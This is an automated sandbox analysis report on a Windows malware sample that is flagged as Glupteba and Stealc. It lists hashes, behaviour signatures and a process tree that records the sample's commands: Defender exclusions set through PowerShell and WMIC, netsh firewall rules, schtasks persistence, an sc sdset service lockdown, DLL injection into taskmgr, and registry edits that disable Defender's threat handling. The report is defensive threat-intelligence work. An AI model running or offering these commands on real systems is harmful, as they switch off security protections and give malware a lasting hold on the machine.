Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
-
submitted
23-04-2024 10:56
General
-
Target
97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe
-
Size
851KB
-
MD5
413a2ef652af005857952eaf1d717f72
-
SHA1
59d552791f8f7a915ca22ef20472237f93a82590
-
SHA256
97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53
-
SHA512
016bb4bd52cd2f5debeed370ee366bc8f32573437b7cbfd2bc5f9fa904956d66dc100dd0aa2b8193b55238722aeec412e700ab675a87de91e3f9503f9bddf18c
-
SSDEEP
24576:SAQzZjtaG/wO8c4A9bSkhhizy5VdsWTdxS1yeA:+ZtaKw5s9bSsim5VmkQyv
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 11 IoCs
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Windows security bypass 2 TTPs 7 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 8 IoCs
-
Executes dropped EXE 31 IoCs
-
Loads dropped DLL 13 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 9 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Windows security modification 2 TTPs 8 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Drops Chrome extension 3 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 45 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 25 IoCs
-
Drops file in Windows directory 13 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe"C:\Users\Admin\AppData\Local\Temp\97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2i0x2ejd\2i0x2ejd.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5738.tmp" "c:\Users\Admin\AppData\Local\Temp\2i0x2ejd\CSC87223928E922495EA2D8134631F43D0.TMP"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\97655f76dbd6e322aea5ecf9dcc82420ec25fb67c6fec0a6febbcd7e8b632e53.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Pictures\Otznutjm0eiG6whvJrjGoUXc.exe"C:\Users\Admin\Pictures\Otznutjm0eiG6whvJrjGoUXc.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u1v4.0.exe"C:\Users\Admin\AppData\Local\Temp\u1v4.0.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 10965⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u1v4.1.exe"C:\Users\Admin\AppData\Local\Temp\u1v4.1.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 12164⤵
- Program crash
-
C:\Users\Admin\Pictures\qLgaAqw7EpH35Xsfdv9RNmRo.exe"C:\Users\Admin\Pictures\qLgaAqw7EpH35Xsfdv9RNmRo.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\qLgaAqw7EpH35Xsfdv9RNmRo.exe"C:\Users\Admin\Pictures\qLgaAqw7EpH35Xsfdv9RNmRo.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\1UrrRz0s9XsDwfGhiB5WokUn.exe"C:\Users\Admin\Pictures\1UrrRz0s9XsDwfGhiB5WokUn.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\1UrrRz0s9XsDwfGhiB5WokUn.exe"C:\Users\Admin\Pictures\1UrrRz0s9XsDwfGhiB5WokUn.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\O1U8QYaajTS0BZPISM3FxE0K.exe"C:\Users\Admin\Pictures\O1U8QYaajTS0BZPISM3FxE0K.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSA96F.tmp\Install.exe.\Install.exe /nxdidQZJ "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 10:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\BTfyksI.exe\" em /eIsite_idTbq 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\NRac57mri7cl0dHPW1FZloc6.exe"C:\Users\Admin\Pictures\NRac57mri7cl0dHPW1FZloc6.exe"3⤵
- Modifies firewall policy service
- Windows security bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exe"C:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exeC:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2c0,0x2c4,0x2c8,0x29c,0x2cc,0x6dd3e1d0,0x6dd3e1dc,0x6dd3e1e84⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lB2G1RrFYTBuxYDMBDNXqJ8n.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\lB2G1RrFYTBuxYDMBDNXqJ8n.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exe"C:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5008 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240423105732" --session-guid=e06e6f85-a56e-4864-bd04-b42543efc5a0 --server-tracking-blob="YTA1NWIwNzJhMWVkZTFhMDlhMDAyMjkyNzEzMGVhNmY2MmU3YzMzNWFiNWQzMTYyMWJlYmQwNGZmY2RkZjFhOTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzODY5ODIxLjUwNTgiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNmIxYWI0ZDQtMWE2Ni00YTY2LWJmOWItODU2NjgyOWFiODZkIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=98050000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exeC:\Users\Admin\Pictures\lB2G1RrFYTBuxYDMBDNXqJ8n.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6d3be1d0,0x6d3be1dc,0x6d3be1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057321\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057321\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057321\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057321\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057321\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404231057321\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xfd6038,0xfd6044,0xfd60505⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\WpkscNvYQek7m1wpic7BQ6Z8.exe"C:\Users\Admin\Pictures\WpkscNvYQek7m1wpic7BQ6Z8.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS9824.tmp\Install.exe.\Install.exe /nxdidQZJ "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 10:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\RQEkPGX.exe\" em /hHsite_idEnW 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4824 -ip 48241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2416 -ip 24161⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\BTfyksI.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\BTfyksI.exe em /eIsite_idTbq 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t 